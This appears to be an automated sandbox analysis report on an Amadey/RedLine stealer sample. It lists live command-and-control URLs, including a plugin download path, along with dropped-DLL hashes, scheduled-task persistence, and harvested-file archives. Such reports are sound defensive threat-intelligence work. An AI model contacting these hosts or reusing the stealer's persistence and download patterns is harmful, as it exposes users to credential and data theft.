                                                    http://185.81.68.147/7vhfjke3/index.phpErundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://185.81.68.148/8Fvu5jh4DbS/index.phpLrundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://185.81.68.147/7vhfjke3/index.php?wal=1tesHrundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://185.81.68.148/8Fvu5jh4DbS/index.phpKrundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://185.81.68.148/8Fvu5jh4DbS/index.phpJGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://185.81.68.148/Fvu5jh4DbS/index.phprundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://185.81.68.147/7vhfjke3/index.php?wal=1urnrundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://185.81.68.147/Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1brundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      http://185.81.68.147/7vhfjke3/index.phpbf198Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://185.81.68.148/8Fvu5jh4DbS/index.php?Rrundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://185.81.68.147/7vhfjke3/index.php?wal=1frundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://185.81.68.148/8Fvu5jh4DbS/index.php:Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://185.81.68.147/7vhfjke3/Plugins/clip64.dllGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://185.81.68.147/7vhfjke3/index.phpXGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://185.81.68.148/8Fvu5jh4DbS/index.phpdedGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        185.81.68.147
                                                        unknownFinland
                                                        50108KLNOPT-ASFItrue
                                                        185.81.68.148
                                                        unknownFinland
                                                        50108KLNOPT-ASFItrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1574259
                                                        Start date and time:2024-12-13 07:46:10 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 58s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:tOuVwTJrau.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:4962575a2378d5c72e7a836ea766e2ad.exe
                                                        Detection:MAL
                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@30/23@0/2
                                                        EGA Information:
                                                        • Successful, ratio: 80%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 58
                                                        • Number of non-executed functions: 253
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.12.23.50, 4.245.163.56, 13.107.246.63
                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 6944 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        TimeTypeDescription
                                                        01:47:02API Interceptor914181x Sleep call for process: Gxtuum.exe modified
                                                        01:47:25API Interceptor86x Sleep call for process: powershell.exe modified
                                                        01:47:48API Interceptor1950022x Sleep call for process: rundll32.exe modified
                                                        06:47:02Task SchedulerRun new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        185.81.68.147yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                        • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                        • 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
                                                        185.81.68.148yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                        • 185.81.68.148/8Fvu5jh4DbS/index.php
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comZiraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                        • 217.20.58.101
                                                        igmbio.pdfGet hashmaliciousUnknownBrowse
                                                        • 217.20.58.99
                                                        4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                                        • 217.20.58.100
                                                        NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                        • 217.20.58.100
                                                        OR8Ti8rf8h.exeGet hashmaliciousAveMaria, DcRat, StormKitty, VenomRATBrowse
                                                        • 217.20.58.100
                                                        Event Schedule.xlsxGet hashmaliciousUnknownBrowse
                                                        • 217.20.58.100
                                                        Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                        • 217.20.58.98
                                                        Tyler_In service Agreement889889.pdfGet hashmaliciousUnknownBrowse
                                                        • 217.20.58.101
                                                        https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnkGet hashmaliciousUnknownBrowse
                                                        • 84.201.211.22
                                                        Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        • 217.20.58.99
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        KLNOPT-ASFIeHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.147
                                                        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                        • 185.81.68.148
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.147
                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                        • 185.81.68.147
                                                        tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.147
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        LxYpBRhMBx.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        KLNOPT-ASFIeHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.147
                                                        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                        • 185.81.68.148
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.147
                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                        • 185.81.68.147
                                                        tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.147
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        LxYpBRhMBx.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        file.exeGet hashmaliciousRedLineBrowse
                                                        • 185.81.68.115
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllyINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllyINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                            C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeyINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                              Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1281024
                                                              Entropy (8bit):6.466046469058072
                                                              Encrypted:false
                                                              SSDEEP:24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
                                                              MD5:C6AABB27450F1A9939A417E86BF53217
                                                              SHA1:B8EF3BB7575139FD6997379415D7119E452B5FC4
                                                              SHA-256:B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
                                                              SHA-512:E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                              Joe Sandbox View:
                                                              • Filename: yINR7uQlPr.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):126976
                                                              Entropy (8bit):6.36076412023942
                                                              Encrypted:false
                                                              SSDEEP:3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
                                                              MD5:C2F3FBBBE6D5F48A71B6B168B1485866
                                                              SHA1:1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
                                                              SHA-256:C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
                                                              SHA-512:E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                              Joe Sandbox View:
                                                              • Filename: yINR7uQlPr.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllulp07j:NllUa
                                                              MD5:732C6F327F6158795C5B7B9B5836F748
                                                              SHA1:B470FC8B70D840DCA9C435F638C2B9A610BDCC4C
                                                              SHA-256:517F81F536702082A40FC866C90755A46D024AF38582FAF43DE765808118ABB7
                                                              SHA-512:7F762E287ED7D65F6AD2899C9F1FA6F827DBCEB254DA2B24AD8E62EB2C318AA62B1D98995666680AD74F82FAE8DAC553D4551C5F1810C063E91C6A09D10D34CE
                                                              Malicious:false
                                                              Preview:@...e...................................\............@..........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                              Category:dropped
                                                              Size (bytes):4615
                                                              Entropy (8bit):7.784266265218416
                                                              Encrypted:false
                                                              SSDEEP:96:aWBPwzYgAqRzuqFBGvLv/2+8R6CbsTWfAcNMXxRrffAcNMXxRnmRv/Y+R:aWBPwzYgXpQj4jb2wNMBJrNMB1mRvA+R
                                                              MD5:59419804CB074B418F154DF7004F4EE3
                                                              SHA1:52DFD704F33ECD00320A301B3B3639CB03F65310
                                                              SHA-256:5C2F9E161DA9093114A3F2AFDFD227CDF90D5E8A2F7D6F47452AD3605070C5AE
                                                              SHA-512:DB56775C293BCE91DC47E9FA3761B10CD6F0D2E5116FCE7834476ADD83BE8D577B10FFB8AC1EDE1DE13D7499DBDE2C8A8FF79112E71AA34CBD34107698F49C67
                                                              Malicious:true
                                                              Preview:PK........Q@DW..............._Files_\DVWHKMNFNN.xlsx..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....|.c..'}.U ....2.'....U0A..*qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M&S.E}.e:>K.[...U.......;.F.Z.vW.6.,.r.[...hh;......\.Cm.p......-_..d..Q.. .i.6..J..........|.C.Dp.....).....o8.,...SV..2\$p.eNG......^.(-....7...RA.j......q..U;...<#VZ.Ut...6......h.........2.Kf......j8.......>W...u...4..d..z.>...s..9.p.Q.)...t<...`.m..R.(.|w.!.....J.y.]j...-......[.-{3..W.=..\.M<O..$...}...G.;n..N.......w.W...f..$.y.$jw...N7..=:.....K..=..."[?2....PK........Q@DW.1n............._Files_\KATAXZVCPS.xlsx..I.@!.D....p..N.........U.D..w.......D.6...l.ZI.(Vc.....E...7{..cx.Z.t.h.*......yHj...!.......|....9g.......`....).p..fU{...5...Q.fo.k..iV.8ug3..6....K..=....2{.usK.%;.l....W<.G.;I.:v.|.W...).g..~j.9t#...z?..R.+&."4.?..rcC..m#_.].RMZ
                                                              Process:C:\Windows\System32\rundll32.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.694985340190863
                                                              Encrypted:false
                                                              SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                              MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                              SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                              SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                              SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                              Malicious:false
                                                              Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                              Process:C:\Windows\System32\rundll32.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.699548026888946
                                                              Encrypted:false
                                                              SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                              MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                              SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                              SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                              SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                              Malicious:false
                                                              Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                              Process:C:\Windows\System32\rundll32.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.699434772658264
                                                              Encrypted:false
                                                              SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                              MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                              SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                              SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                              SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                              Malicious:false
                                                              Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                              Process:C:\Windows\System32\rundll32.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.695685570184741
                                                              Encrypted:false
                                                              SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                              MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                              SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                              SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                              SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                              Malicious:false
                                                              Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
